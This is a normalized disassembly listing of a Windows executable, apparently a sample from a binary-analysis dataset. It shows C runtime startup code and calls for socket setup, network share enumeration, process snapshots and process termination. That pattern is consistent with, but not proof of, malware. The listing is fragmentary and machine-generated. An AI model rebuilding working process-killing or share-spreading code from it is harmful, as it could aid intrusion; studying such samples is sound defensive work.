call [ __p__fmode@IAT ]
mov ecx [ rw-data ]
mov [ eax ] ecx
call [ __import_lookup_table_3(MSVCRT:__p__commode) ]
mov ecx [ rw-data ]
mov [ eax ] ecx
mov eax [ __import_lookup_table_3(MSVCRT:_adjust_fdiv) ]
mov eax [ eax ]
mov [ rw-data ] eax
call sub_405def
cmp [ rw-data ] ebx
jne r-xdata
call sub_405dda
push rw-data
push rw-data
call _initterm
mov eax [ rw-data ]
mov [ ebp - 0x6c ] eax
lea eax [ ebp - 0x6c ]
push eax
push [ rw-data ]
lea eax [ ebp - 0x64 ]
push eax
lea eax [ ebp - 0x70 ]
push eax
lea eax [ ebp - 0x60 ]
push eax
call [ __getmainargs@IAT ]
push rw-data
push rw-data
call _initterm
add esp 0x24
mov eax [ __import_lookup_table_3(MSVCRT:_acmdln) ]
mov esi [ eax ]
mov [ ebp - 0x74 ] esi
cmp [ esi ] 0x22
jne r-xdata
push sub_405dec
call [ __setusermatherr@IAT ]
pop ecx
cmp [ esi ] 0x20
jbe r-xdata
inc esi
mov [ ebp - 0x74 ] esi
mov al [ esi ]
cmp al bl
je r-xdata
mov al [ esi ]
cmp al bl
je r-xdata
inc esi
mov [ ebp - 0x74 ] esi
jmp r-xdata
cmp [ esi ] 0x22
jne r-xdata
cmp al 0x22
jne r-xdata
mov [ ebp - 0x30 ] ebx
lea eax [ ebp - 0x5c ]
push eax
call [ __import_lookup_table_0(KERNEL32:GetStartupInfoA) ]
test [ ebp - 0x30 ] 0x1
je r-xdata
cmp al 0x20
jbe r-xdata
inc esi
mov [ ebp - 0x74 ] esi
push 0xa
pop eax
movzx eax [ ebp - 0x2c ]
jmp r-xdata
push eax
push esi
push ebx
push ebx
call [ __import_lookup_table_0(KERNEL32:GetModuleHandleA) ]
push eax
call sub_401000
mov [ ebp - 0x68 ] eax
push eax
call [ __import_lookup_table_3(MSVCRT:exit) ]
sub_401067
mov eax r-xdata
retn
sub_401350
sub esp 0x190
lea eax [ esp ]
push eax
push 0x2
call [ WSAStartup@IAT ]
neg eax
sbb eax eax
inc eax
add esp 0x190
retn
sub_4036c0
mov eax [ esp + 0x4 ]
lea ecx [ esp + 0x4 ]
push 0x1
push ecx
mov [ esp + 0xc ] eax
call sub_4035e0
mov ecx [ esp + 0xc ]
add esp 0x8
neg eax
sbb eax eax
and eax ecx
retn
sub_4036f0
mov eax [ esp + 0x4 ]
push eax
call sub_4036c0
add esp 0x4
test eax eax
je r-xdata
xor eax eax
retn
push 0x1
push eax
call [ TerminateProcess@IAT ]
retn
sub_403710
mov eax [ rw-data ]
mov ecx [ eax ]
push ecx
call sub_4036f0
add esp 0x4
neg eax
sbb al al
and al 0xa
add al 0x45
mov [ rw-data ] al
jmp sub_403d70
sub_403740
mov eax [ rw-data ]
push eax
call sub_404e40
add esp 0x4
neg eax
sbb al al
and al 0xa
add al 0x45
mov [ rw-data ] al
jmp sub_403d70
sub_403950
mov eax [ rw-data ]
push 0x0
push eax
call [ __import_lookup_table_0(KERNEL32:CreateDirectoryA) ]
neg eax
sbb al al
and al 0xa
add al 0x45
mov [ rw-data ] al
jmp sub_403d70
sub_404520
mov eax [ rw-data ]
mov edx [ eax ]
lea ecx [ eax + 0x4 ]
push ecx
push edx
call sub_4043a0
add esp 0x8
retn
sub_404c90
push rw-data
call sub_405ae0
push 0x0
push rw-data
call sub_401500
add esp 0xc
jmp sub_404cb0
WNetCloseEnum
jmp [ WNetCloseEnum@IAT ]
WNetEnumResourceA
jmp [ WNetEnumResourceA@IAT ]
WNetOpenEnumA
jmp [ WNetOpenEnumA@IAT ]
__CxxFrameHandler
jmp [ __import_lookup_table_3(MSVCRT:__CxxFrameHandler) ]
sub_405dc1
mov esp [ ebp - 0x18 ]
push [ ebp - 0x78 ]
call [ _exit@IAT ]
int3
_XcptFilter
jmp [ __import_lookup_table_3(MSVCRT:_XcptFilter) ]
_initterm
jmp [ _initterm@IAT ]
sub_405dda
push 0x30000
push 0x10000
call _controlfp
pop ecx
pop ecx
retn
sub_405dec
xor eax eax
retn
sub_405def
retn
_except_handler3
jmp [ _except_handler3@IAT ]
_controlfp
jmp [ _controlfp@IAT ]
Process32Next
jmp [ __import_lookup_table_0(KERNEL32:Process32Next) ]
Process32First
jmp [ Process32First@IAT ]
CreateToolhelp32Snapshot
jmp [ CreateToolhelp32Snapshot@IAT ]
sub_405e20
mov eax r--data
jmp __CxxFrameHandler
